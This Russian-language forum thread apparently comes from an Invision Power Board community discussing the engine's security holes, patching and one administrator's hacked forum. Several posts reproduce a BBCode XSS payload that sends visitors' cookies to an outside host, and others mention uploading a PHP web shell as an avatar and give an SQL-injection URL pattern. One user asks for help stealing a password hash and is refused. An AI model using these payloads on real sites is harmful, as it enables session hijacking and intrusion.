Перейти к контенту

Уязвимости форумов Invision Power Board


Рекомендуемые сообщения

Вопрос на засыпку

вот от эту XSS заткнули?

 

[po*st=1000[to*pic=target style=background:url(java script:document.images[1].src="http://antichat.ru/cgi-bin/s.jpg?"+document.cookie); ][/to*pic]][/po*st]

 

И вообще по вот этому треду что думаем?

_http://forum.antichat.ru/thread15678.html

 

И еще в кач-ве фотки в профиле можно залить н.р.

вот это r57shell 1.24 (тута _http://rst.void.ru/)

Как будем боротся?

Ссылка на комментарий
Поделиться на других сайтах

  • Ответы 1,2k
  • Создана
  • Последний ответ

Лучшие авторы в этой теме

Лучшие авторы в этой теме

Загружено фотографий

Вопрос на засыпку

вот от эту XSS заткнули?

 

[po*st=1000[to*pic=target style=background:url(java script:document.images[1].src="http://antichat.ru/cgi-bin/s.jpg?"+document.cookie); ][/to*pic]][/po*st]

 

И вообще по вот этому треду что думаем?

_http://forum.antichat.ru/thread15678.html

 

И еще в кач-ве фотки в профиле можно залить н.р.

вот это r57shell 1.24 (тута _http://rst.void.ru/)

Как будем боротся?

Было год назад.

Ссылка на комментарий
Поделиться на других сайтах

Нестандартные префиксы в какой то мере спасают от скрипткиддисов.

 

Префиксы базы форума легко светятся при постинге кода в теге SQL, об этом я уже где-то говорил. Таким образом считай что они написаны в лого твоего форума черным по белому.

Ссылка на комментарий
Поделиться на других сайтах

Префиксы базы форума легко светятся при постинге кода в теге SQL, об этом я уже где-то говорил.

А можно ещё раз для пропустивших?

Ссылка на комментарий
Поделиться на других сайтах

Префиксы базы форума легко светятся при постинге кода в теге SQL, об этом я уже где-то говорил.

А можно ещё раз для пропустивших?

 

SELECT j.post_id, p.journal_id, m.name 
FROM test_jtracker j
LEFT JOIN test_jposts p ON ( j.post_id = p.pid ) 
LEFT JOIN test_members m ON (m.id = p.journal_id)
GROUP BY j.post_id
HAVING j.post_id>0 AND m.name IS NULL
ORDER BY m.name ASC

 

в версиях 2.0.х при постинге такого или похожего кода (как будто ты делаешь запрос в реальную БД) у тебя будут на экране реальные префиксы БД, по крайней мере на до 2.0.4 подобное работает.

Сам заметил случайно, когда в примере писал тестовые префиксы, а после публикации сообщения вылезли другие, совсем не те, что указывал в примере кода, как оказалось это были реальные префиксы. На 2.1.4-5 эта штука уже не работает или что-то было сделано дополнительно. Кто-то тут говорил, что баг этот на уровне абстракции к базе или что-то такое.

Ссылка на комментарий
Поделиться на других сайтах

в версиях 2.0.х при постинге такого или похожего кода (как будто ты делаешь запрос в реальную БД) у тебя будут на экране реальные префиксы БД, по крайней мере на до 2.0.4 подобное работает.
Не верю ©

 

Проверил на своей 2.0.4 — не работает. Покажите, пожалуйста, кусок кода, который влечет за собой автозамену участков постинга данными подключения к базе данных.

Ссылка на комментарий
Поделиться на других сайтах

в версиях 2.0.х при постинге такого или похожего кода (как будто ты делаешь запрос в реальную БД) у тебя будут на экране реальные префиксы БД, по крайней мере на до 2.0.4 подобное работает.
Не верю ©

 

Проверил на своей 2.0.4 — не работает. Покажите, пожалуйста, кусок кода, который влечет за собой автозамену участков постинга данными подключения к базе данных.

 

Как защитить форум от взлома? кажется тут эта тема обсуждалась. Причем прикол в том, что на этом форуме тоже работало на момент создания темы. У меня на 2.0.4 после последних двух исправлений безопасности и смены серверного ПО тоже перестало работать, но возможность такая была и где-то вполне возможно, что работает.

Ссылка на комментарий
Поделиться на других сайтах

Кто что скажет http://ivdb.org/poc/1337.htm

 

Это проблемы писателей модов, к форуму отношение косвенное, но не более того. Мой совет - уберите мод :D или пишите автору.

Ссылка на комментарий
Поделиться на других сайтах

  • 2 недели спустя...

Помогите плиз ! Надо узнать пароль одного пользователя на форуме IPB .

Долго читать просто . Понял что надо в личку написать сообщние и получаешь его pass_hash из cookie .

Так какое сообщение надо написать ( sound и video тэгов нет ) .

 

Версия IPB :

Powered by: Invision Power Board (Free Trial) v2.0.1 © 2006 Invision Power Services, Inc.

Get your free trial here!

Ссылка на комментарий
Поделиться на других сайтах

А вроде форум про хаки , взломы и уязвимости ...

а) форум про движок IPB

б) если нужна информация о уязвимостях, то читай тему с самого начала и ничего не пропускай

в) если интересуют взлом форума или другие противозаконные действия - добро пожаловать на securitylab.ru или ещё куда-нибудь, но подальше отсюда :D

Ссылка на комментарий
Поделиться на других сайтах

Люди добрые, помогите! У меня стоит версия 2.0.4 и сегодня я обнаружил, что в группе Администраторы появился еще один юзер. Обновления безопасности никогда не ставил. Только моды.

Как можно узнать по какому способу меня взломали? Что первым делом можно посмотреть? Какие следы могли остаться? Доступ к сайту я пока закрыл на пароль (в админке хостинга).

Ссылка на комментарий
Поделиться на других сайтах

Lenar

 

Мой Вам совет: начинайте ставить все обновления безопасность - нет смысла узнавать, как был произведен взлом и закрывать только эту дырку, если завтра все может повториться через другую уязвимость...

 

Установка всех обновлений - это безусловная необходимость. Иначе незачем вообще думать о безопасности.

Ссылка на комментарий
Поделиться на других сайтах

Mokkey,

спасибо. А те уязвимости, которые указаны в этом топике полные или где-то еще можно посмотреть? Может где-то есть все уязвимости сразу, чтобы не искать по одному?

Ссылка на комментарий
Поделиться на других сайтах

Каюсь, внимательно прочел только половину топика, до стр. 14 из 29.

Побежал :D ставить заплатки на 1.3.1. Вроде все поставил.

 

Это я к тому, что мой форум немного потрепали. Вот таким образом:

a href='mailto:<a href='http://wj`=`' target='_blank'></a>'><a href='http://wj`=`' target='_blank'></a></a>[/color]
span style='color:white'>` style=`background:url(java script:document.images   [1].src="http://antichat.ru/cgi-bin/s.jpg?"+document.cookie)`</span

Вот что значит год без заплаток :)

 

Дочитываю топик ;)

Ссылка на комментарий
Поделиться на других сайтах

Утка. Уязвимость была закрыта значительно раньше, чем написано на сайте, что она вообще была открыта.

 

SQL-injection в Invision Power Board 2.1.x

(discovered by red_byte)

 

Недавно, поковыряв сорсы IPB, я обнаружил уязвимость в модуле ?act=Online, который выводит статистику юзеров, которые сейчас находятся на форуме. Проблема состоит в том, что переменная st не фильтруется должным образом. Возникает возможность внедрения SQL-инъекции.

 

http://victim/index.php?act=Online&st=-1[your_sql_code_here]

Надо отметить, что данная бага присутствует на таких популярных форумах как Web-Hack и DamageLab.

Гыы =) Афтар-то у нас со знанием дела! :D

Ссылка на комментарий
Поделиться на других сайтах

Вопрос на засыпку как мог зарегится пользователь с IP 127.0.0.1?

(в форуме на движке IPB 2.0.х)

Иногда я себя видел в списке он-лайн с таким IP. :D

Ссылка на комментарий
Поделиться на других сайтах


×
×
  • Создать...

Важная информация

Находясь на нашем сайте, вы соглашаетесь на использование файлов cookie, а также с нашим положением о конфиденциальности Политика конфиденциальности и пользовательским соглашением Условия использования.